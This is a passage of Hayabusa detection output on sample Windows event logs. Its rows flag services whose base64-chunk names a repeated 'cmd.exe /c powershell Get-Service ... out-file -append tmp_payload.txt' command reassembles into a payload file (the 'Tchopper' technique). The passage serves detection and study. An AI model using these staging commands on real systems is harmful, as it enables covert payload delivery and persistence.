start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 